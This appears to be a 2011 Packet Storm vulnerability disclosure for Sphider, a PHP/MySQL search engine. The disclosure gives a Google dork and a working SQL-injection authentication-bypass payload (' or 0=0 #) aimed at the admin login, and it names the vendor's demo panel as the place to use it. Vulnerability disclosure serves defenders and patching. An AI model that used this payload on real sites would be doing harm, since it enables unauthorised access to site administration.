Sphider SQL Injection

2011-07-12T00:00:00
ID PACKETSTORM:102981
Type packetstorm
Reporter Karthik R
Modified 2011-07-12T00:00:00

Description

                                        
                                            `Sphider SQL injection vulnerabilties  
  
vendor: www.sphider.eu  
Author: Karthik R (3psil0nLambDa)  
Email: Karthik.cupid@gmail.com  
My blog: epsilonlambda.co.cc  
Google dork: © Ando Saabas 2005-2007  
  
Description about the Sphider  
  
Sphider is a lightweight web spider and search engine written in PHP, using MySQL as its back end database. It is a great tool for adding search functionality to your web site or building your custom search engine. Sphider is small, easy to set up and modify, and is used in thousands of websites across the world.   
  
Exploits:  
  
SQLi Vulnerability  
  
The attackers can use the authentication bypass to get in to the admin panel in the http://www.sphider.eu/demo.php section of the site.  
  
Exploit: Username: ' or 0=0 #  
Password: ' or 0=0 #  
-----------------------------------------------------------------------------------------------------------------------------  
Tribite to side^effects and love to taashu.  
-----------------------------------------------------------------------------------------------------------------------------  
`